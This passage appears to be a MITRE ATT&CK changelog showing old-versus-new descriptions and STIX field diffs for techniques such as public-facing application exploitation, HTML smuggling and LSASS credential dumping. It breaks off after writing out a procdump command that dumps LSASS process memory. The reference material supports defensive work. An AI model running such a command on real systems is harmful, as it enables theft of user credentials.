descriptionAdversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise networkAdversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T1190] Exploit Public-Facing Application

Current version: 2.3


Old Description
New Description
t1Adversaries may attempt to take advantage of a weakness in at1Adversaries may attempt to take advantage of a weakness in a
>n Internet-facing computer or program using software, data, >n Internet-facing computer or program using software, data, 
>or commands in order to cause unintended or unanticipated be>or commands in order to cause unintended or unanticipated be
>havior. The weakness in the system can be a bug, a glitch, o>havior. The weakness in the system can be a bug, a glitch, o
>r a design vulnerability. These applications are often websi>r a design vulnerability. These applications are often websi
>tes, but can include databases (like SQL)(Citation: NVD CVE->tes, but can include databases (like SQL), standard services
>2016-6662), standard services (like SMB(Citation: CIS Multip> (like SMB or SSH), network device administration and manage
>le SMB Vulnerabilities) or SSH), network device administrati>ment protocols (like SNMP and Smart Install), and any other 
>on and management protocols (like SNMP and Smart Install(Cit>applications with Internet accessible open sockets, such as 
>ation: US-CERT TA18-106A Network Infrastructure Devices 2018>web servers and related services.(Citation: NVD CVE-2016-666
>)(Citation: Cisco Blog Legacy Device Attacks)), and any othe>2)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-
>r applications with Internet accessible open sockets, such a>CERT TA18-106A Network Infrastructure Devices 2018)(Citation
>s web servers and related services.(Citation: NVD CVE-2014-7>: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7
>169) Depending on the flaw being exploited this may include >169) Depending on the flaw being exploited this may include 
>[Exploitation for Defense Evasion](https://attack.mitre.org/>[Exploitation for Defense Evasion](https://attack.mitre.org/
>techniques/T1211).   If an application is hosted on cloud-ba>techniques/T1211).   If an application is hosted on cloud-ba
>sed infrastructure and/or is containerized, then exploiting >sed infrastructure and/or is containerized, then exploiting 
>it may lead to compromise of the underlying instance or cont>it may lead to compromise of the underlying instance or cont
>ainer. This can allow an adversary a path to access the clou>ainer. This can allow an adversary a path to access the clou
>d or container APIs, exploit container host access via [Esca>d or container APIs, exploit container host access via [Esca
>pe to Host](https://attack.mitre.org/techniques/T1611), or t>pe to Host](https://attack.mitre.org/techniques/T1611), or t
>ake advantage of weak identity and access management policie>ake advantage of weak identity and access management policie
>s.  For websites and databases, the OWASP top 10 and CWE top>s.  For websites and databases, the OWASP top 10 and CWE top
> 25 highlight the most common web-based vulnerabilities.(Cit> 25 highlight the most common web-based vulnerabilities.(Cit
>ation: OWASP Top 10)(Citation: CWE top 25)>ation: OWASP Top 10)(Citation: CWE top 25)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-07-20 21:51:45.776000+00:002022-04-19 17:06:53.032000+00:00
descriptionAdversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
external_references[1]['source_name']NVD CVE-2016-6662CWE top 25
external_references[1]['description']National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019.
external_references[1]['url']https://nvd.nist.gov/vuln/detail/CVE-2016-6662https://cwe.mitre.org/top25/index.html
external_references[3]['source_name']US-CERT TA18-106A Network Infrastructure Devices 2018NVD CVE-2016-6662
external_references[3]['description']US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.
external_references[3]['url']https://us-cert.cisa.gov/ncas/alerts/TA18-106Ahttps://nvd.nist.gov/vuln/detail/CVE-2016-6662
external_references[4]['source_name']Cisco Blog Legacy Device AttacksNVD CVE-2014-7169
external_references[4]['description']Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.
external_references[4]['url']https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954https://nvd.nist.gov/vuln/detail/CVE-2014-7169
external_references[5]['source_name']NVD CVE-2014-7169Cisco Blog Legacy Device Attacks
external_references[5]['description']National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.
external_references[5]['url']https://nvd.nist.gov/vuln/detail/CVE-2014-7169https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
external_references[7]['source_name']CWE top 25US-CERT TA18-106A Network Infrastructure Devices 2018
external_references[7]['description']Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019.US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.
external_references[7]['url']https://cwe.mitre.org/top25/index.htmlhttps://us-cert.cisa.gov/ncas/alerts/TA18-106A

[T1210] Exploitation of Remote Services

Current version: 1.1


Old Description
New Description
t1Adversaries may exploit remote services to gain unauthorizedt1Adversaries may exploit remote services to gain unauthorized
> access to internal systems once inside of a network. Exploi> access to internal systems once inside of a network. Exploi
>tation of a software vulnerability occurs when an adversary >tation of a software vulnerability occurs when an adversary 
>takes advantage of a programming error in a program, service>takes advantage of a programming error in a program, service
>, or within the operating system software or kernel itself t>, or within the operating system software or kernel itself t
>o execute adversary-controlled code. A common goal for post->o execute adversary-controlled code. A common goal for post-
>compromise exploitation of remote services is for lateral mo>compromise exploitation of remote services is for lateral mo
>vement to enable access to a remote system.  An adversary ma>vement to enable access to a remote system.  An adversary ma
>y need to determine if the remote system is in a vulnerable >y need to determine if the remote system is in a vulnerable 
>state, which may be done through [Network Service Scanning](>state, which may be done through [Network Service Discovery]
>https://attack.mitre.org/techniques/T1046) or other Discover>(https://attack.mitre.org/techniques/T1046) or other Discove
>y methods looking for common, vulnerable software that may b>ry methods looking for common, vulnerable software that may 
>e deployed in the network, the lack of certain patches that >be deployed in the network, the lack of certain patches that
>may indicate vulnerabilities,  or security software that may> may indicate vulnerabilities,  or security software that ma
> be used to detect or contain remote exploitation. Servers a>y be used to detect or contain remote exploitation. Servers 
>re likely a high value target for lateral movement exploitat>are likely a high value target for lateral movement exploita
>ion, but endpoint systems may also be at risk if they provid>tion, but endpoint systems may also be at risk if they provi
>e an advantage or access to additional resources.  There are>de an advantage or access to additional resources.  There ar
> several well-known vulnerabilities that exist in common ser>e several well-known vulnerabilities that exist in common se
>vices such as SMB (Citation: CIS Multiple SMB Vulnerabilitie>rvices such as SMB (Citation: CIS Multiple SMB Vulnerabiliti
>s) and RDP (Citation: NVD CVE-2017-0176) as well as applicat>es) and RDP (Citation: NVD CVE-2017-0176) as well as applica
>ions that may be used within internal networks such as MySQL>tions that may be used within internal networks such as MySQ
> (Citation: NVD CVE-2016-6662) and web server services. (Cit>L (Citation: NVD CVE-2016-6662) and web server services.(Cit
>ation: NVD CVE-2014-7169)  Depending on the permissions leve>ation: NVD CVE-2014-7169)  Depending on the permissions leve
>l of the vulnerable remote service an adversary may achieve >l of the vulnerable remote service an adversary may achieve 
>[Exploitation for Privilege Escalation](https://attack.mitre>[Exploitation for Privilege Escalation](https://attack.mitre
>.org/techniques/T1068) as a result of lateral movement explo>.org/techniques/T1068) as a result of lateral movement explo
>itation as well.>itation as well.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 20:23:01.478000+00:002022-02-24 15:06:46.006000+00:00
descriptionAdversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.
x_mitre_detectionDetecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of [Discovery](https://attack.mitre.org/tactics/TA0007), or other unusual network traffic that may indicate additional tools transferred to the system.

[T1027.006] Obfuscated Files or Information: HTML Smuggling

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 12:03:12.510000+00:002022-05-19 16:29:47.637000+00:00
external_references[1]['source_name']HTML Smuggling Menlo Security 2020Outlflank HTML Smuggling 2018
external_references[1]['description']Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021.Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021.
external_references[1]['url']https://www.menlosecurity.com/blog/new-attack-alert-durihttps://outflank.nl/blog/2018/08/14/html-smuggling-explained/
external_references[2]['source_name']Outlflank HTML Smuggling 2018MSTIC NOBELIUM May 2021
external_references[2]['description']Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021.Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.
external_references[2]['url']https://outflank.nl/blog/2018/08/14/html-smuggling-explained/https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
external_references[3]['source_name']MSTIC NOBELIUM May 2021HTML Smuggling Menlo Security 2020
external_references[3]['description']Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021.
external_references[3]['url']https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/https://www.menlosecurity.com/blog/new-attack-alert-duri
x_mitre_defense_bypassed[0]Web content filtersAnti-virus
x_mitre_defense_bypassed[1]Anti-virusWeb Content Filters
x_mitre_defense_bypassed[2]Static file analysisStatic File Analysis
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsKrishnan Subramanian, @krish203
x_mitre_contributorsVinay Pidathala

[T1564] Hide Artifacts

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-20 19:01:56.752000+00:002022-03-25 15:59:09.632000+00:00
external_references[2]['description']Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 31, 2020.Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.
external_references[2]['url']http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdfhttps://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf
x_mitre_data_sources[0]Process: Process CreationUser Account: User Account Creation
x_mitre_data_sources[1]File: File CreationProcess: OS API Execution
x_mitre_data_sources[2]Application Log: Application Log ContentWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[3]Command: Command ExecutionFirmware: Firmware Modification
x_mitre_data_sources[4]File: File MetadataService: Service Creation
x_mitre_data_sources[5]User Account: User Account CreationFile: File Modification
x_mitre_data_sources[7]File: File ModificationProcess: Process Creation
x_mitre_data_sources[8]Script: Script ExecutionApplication Log: Application Log Content
x_mitre_data_sources[9]Process: OS API ExecutionCommand: Command Execution
x_mitre_data_sources[10]Windows Registry: Windows Registry Key ModificationFile: File Metadata
x_mitre_data_sources[11]Firmware: Firmware ModificationFile: File Creation
x_mitre_data_sources[12]Service: Service CreationScript: Script Execution

[T1202] Indirect Command Execution

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:09:22.559000+00:002022-05-05 05:06:38.938000+00:00
external_references[1]['source_name']VectorSec ForFiles Aug 2017Evi1cg Forfiles Nov 2017
external_references[1]['description']vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018.Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018.
external_references[1]['url']https://twitter.com/vector_sec/status/896049052642533376https://twitter.com/Evi1cg/status/935027922397573120
external_references[2]['source_name']Evi1cg Forfiles Nov 2017RSA Forfiles Aug 2017
external_references[2]['description']Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018.Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018.
external_references[2]['url']https://twitter.com/Evi1cg/status/935027922397573120https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
external_references[3]['source_name']RSA Forfiles Aug 2017VectorSec ForFiles Aug 2017
external_references[3]['description']Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018.vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018.
external_references[3]['url']https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexehttps://twitter.com/vector_sec/status/896049052642533376
x_mitre_defense_bypassed[1]Application controlApplication Control
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_defense_bypassedApplication control by file name or path

[T1056] Input Capture

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-24 18:21:08.497000+00:002022-03-08 21:05:20.658000+00:00
x_mitre_data_sources[1]Driver: Driver LoadProcess: Process Metadata
x_mitre_data_sources[2]Process: OS API ExecutionDriver: Driver Load
x_mitre_data_sources[3]Process: Process CreationFile: File Modification
x_mitre_data_sources[4]File: File ModificationProcess: Process Creation
x_mitre_data_sources[5]Process: Process MetadataProcess: OS API Execution

[T1546.006] Event Triggered Execution: LC_LOAD_DYLIB Addition

Current version: 1.0


Old Description
New Description
t1Adversaries may establish persistence by executing malicioust1Adversaries may establish persistence by executing malicious
> content triggered by the execution of tainted binaries. Mac> content triggered by the execution of tainted binaries. Mac
>h-O binaries have a series of headers that are used to perfo>h-O binaries have a series of headers that are used to perfo
>rm certain operations when a binary is loaded. The LC_LOAD_D>rm certain operations when a binary is loaded. The LC_LOAD_D
>YLIB header in a Mach-O binary tells macOS and OS X which dy>YLIB header in a Mach-O binary tells macOS and OS X which dy
>namic libraries (dylibs) to load during execution time. Thes>namic libraries (dylibs) to load during execution time. Thes
>e can be added ad-hoc to the compiled binary as long as adju>e can be added ad-hoc to the compiled binary as long as adju
>stments are made to the rest of the fields and dependencies.>stments are made to the rest of the fields and dependencies.
> (Citation: Writing Bad Malware for OSX) There are tools ava>(Citation: Writing Bad Malware for OSX) There are tools avai
>ilable to perform these changes.  Adversaries may modify Mac>lable to perform these changes.  Adversaries may modify Mach
>h-O binary headers to load and execute malicious dylibs ever>-O binary headers to load and execute malicious dylibs every
>y time the binary is executed. Although any changes will inv> time the binary is executed. Although any changes will inva
>alidate digital signatures on binaries because the binary is>lidate digital signatures on binaries because the binary is 
> being modified, this can be remediated by simply removing t>being modified, this can be remediated by simply removing th
>he LC_CODE_SIGNATURE command from the binary so that the sig>e LC_CODE_SIGNATURE command from the binary so that the sign
>nature isn’t checked at load time. (Citation: Malware Persis>ature isn’t checked at load time.(Citation: Malware Persiste
>tence on OS X)>nce on OS X)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-30 00:51:58.454000+00:002022-04-20 17:08:21.101000+00:00
descriptionAdversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
external_references[1]['source_name']Writing Bad Malware for OSXMalware Persistence on OS X
external_references[1]['description']Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.
external_references[1]['url']https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdfhttps://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
external_references[2]['source_name']Malware Persistence on OS XWriting Bad Malware for OSX
external_references[2]['description']Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.
external_references[2]['url']https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdfhttps://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
x_mitre_data_sources[0]Process: Process CreationFile: File Metadata
x_mitre_data_sources[1]Command: Command ExecutionFile: File Modification
x_mitre_data_sources[2]File: File MetadataProcess: Process Creation
x_mitre_data_sources[3]File: File ModificationCommand: Command Execution

[T1547.008] Boot or Logon Autostart Execution: LSASS Driver

Current version: 1.0


Old Description
New Description
t1Adversaries may modify or add LSASS drivers to obtain persist1Adversaries may modify or add LSASS drivers to obtain persis
>tence on compromised systems. The Windows security subsystem>tence on compromised systems. The Windows security subsystem
> is a set of components that manage and enforce the security> is a set of components that manage and enforce the security
> policy for a computer or domain. The Local Security Authori> policy for a computer or domain. The Local Security Authori
>ty (LSA) is the main component responsible for local securit>ty (LSA) is the main component responsible for local securit
>y policy and user authentication. The LSA includes multiple >y policy and user authentication. The LSA includes multiple 
>dynamic link libraries (DLLs) associated with various other >dynamic link libraries (DLLs) associated with various other 
>security functions, all of which run in the context of the L>security functions, all of which run in the context of the L
>SA Subsystem Service (LSASS) lsass.exe process. (Citation: M>SA Subsystem Service (LSASS) lsass.exe process.(Citation: Mi
>icrosoft Security Subsystem)  Adversaries may target LSASS d>crosoft Security Subsystem)  Adversaries may target LSASS dr
>rivers to obtain persistence. By either replacing or adding >ivers to obtain persistence. By either replacing or adding i
>illegitimate drivers (e.g., [Hijack Execution Flow](https://>llegitimate drivers (e.g., [Hijack Execution Flow](https://a
>attack.mitre.org/techniques/T1574)), an adversary can use LS>ttack.mitre.org/techniques/T1574)), an adversary can use LSA
>A operations to continuously execute malicious payloads.> operations to continuously execute malicious payloads.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 16:52:26.567000+00:002022-04-20 16:34:43.405000+00:00
descriptionAdversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
external_references[1]['source_name']Microsoft Security SubsystemMicrosoft LSA Protection Mar 2014
external_references[1]['description']Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017.Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.
external_references[1]['url']https://technet.microsoft.com/library/cc961760.aspxhttps://technet.microsoft.com/library/dn408187.aspx
external_references[2]['source_name']Microsoft LSA Protection Mar 2014Microsoft DLL Security
external_references[2]['description']Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017.
external_references[2]['url']https://technet.microsoft.com/library/dn408187.aspxhttps://msdn.microsoft.com/library/windows/desktop/ff919712.aspx
external_references[3]['source_name']Microsoft DLL SecurityMicrosoft Security Subsystem
external_references[3]['description']Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017.Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017.
external_references[3]['url']https://msdn.microsoft.com/library/windows/desktop/ff919712.aspxhttps://technet.microsoft.com/library/cc961760.aspx
x_mitre_data_sources[0]Module: Module LoadFile: File Creation
x_mitre_data_sources[1]Driver: Driver LoadFile: File Modification
x_mitre_data_sources[2]File: File ModificationModule: Module Load
x_mitre_data_sources[3]File: File CreationDriver: Driver Load

[T1003.001] OS Credential Dumping: LSASS Memory

Current version: 1.1


Old Description
New Description
t1Adversaries may attempt to access credential material storedt1Adversaries may attempt to access credential material stored
> in the process memory of the Local Security Authority Subsy> in the process memory of the Local Security Authority Subsy
>stem Service (LSASS). After a user logs on, the system gener>stem Service (LSASS). After a user logs on, the system gener
>ates and stores a variety of credential materials in LSASS p>ates and stores a variety of credential materials in LSASS p
>rocess memory. These credential materials can be harvested b>rocess memory. These credential materials can be harvested b
>y an administrative user or SYSTEM and used to conduct [Late>y an administrative user or SYSTEM and used to conduct [Late
>ral Movement](https://attack.mitre.org/tactics/TA0008) using>ral Movement](https://attack.mitre.org/tactics/TA0008) using
> [Use Alternate Authentication Material](https://attack.mitr> [Use Alternate Authentication Material](https://attack.mitr
>e.org/techniques/T1550).  As well as in-memory techniques, t>e.org/techniques/T1550).  As well as in-memory techniques, t
>he LSASS process memory can be dumped from the target host a>he LSASS process memory can be dumped from the target host a
>nd analyzed on a local system.  For example, on the target h>nd analyzed on a local system.  For example, on the target h
>ost use procdump:  * <code>procdump -ma lsass.exe lsass_dump>ost use procdump:  * <code>procdump -ma lsass.exe lsass_dump
